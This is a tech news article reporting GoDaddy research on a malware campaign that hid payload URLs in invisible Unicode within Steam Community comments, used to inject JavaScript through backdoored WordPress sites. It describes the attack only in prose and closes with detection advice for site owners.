- Malware hides payload in Steam Community comments
- WordPress sites used to host backdoors
- Nearly 2,000 sites compromised since July
Security researchers from GoDaddy found a cheeky new malware campaign that used comments made by Steam Community accounts as command-and-control (C2) infrastructure.
Here is how the attack plays out: The attackers would first find vulnerable WordPress websites, or those protected by weak credentials, and use them to host PHP malware somewhere in the site’s files. For example, the sample was found in a theme’s ‘functions.php’ file. This malware contains both a JavaScript injection component, and a server-side backdoor.
Then, whenever a visitor loads the infected website, the malware contacts one of several Steam Community profiles and downloads the contents of profile comments. On surface level, these comments look harmless (albeit incoherent), but they also contain invisible Unicode characters which carry the actual payload.
Industry support
“This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload,” GoDaddy said.
The malware then extracts the characters, converts them into binary data, and reconstructs the original bytes. The researchers found that this recovered data contains a URL controlled by the attackers, which points to a domain hosting a JavaScript file spoofing a legitimate library.
The malware then uses WordPress to load the attacker-controlled JavaScript on every frontend page, which the visitors’ browsers then download and run, infecting themselves in the process.
In the campaign, there are two sets of targets – vulnerable WordPress websites, and their visitors. Since uncovering the campaign in July last year, GoDaddy said it found almost 2,000 compromised WordPress sites. Unfortunately, the research report stops short of describing what the malware does to visitors.
If you run a WordPress website, GoDaddy recommends to check for references to Steam Community URLs, external JavaScript injections, as well as outbound connections from WordPress to Steam.
Via BleepingComputer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds.
https://cdn.mos.cms.futurecdn.net/bx8fPhUoHLYdN39sZtNWZk-1920-80.jpg
Source link
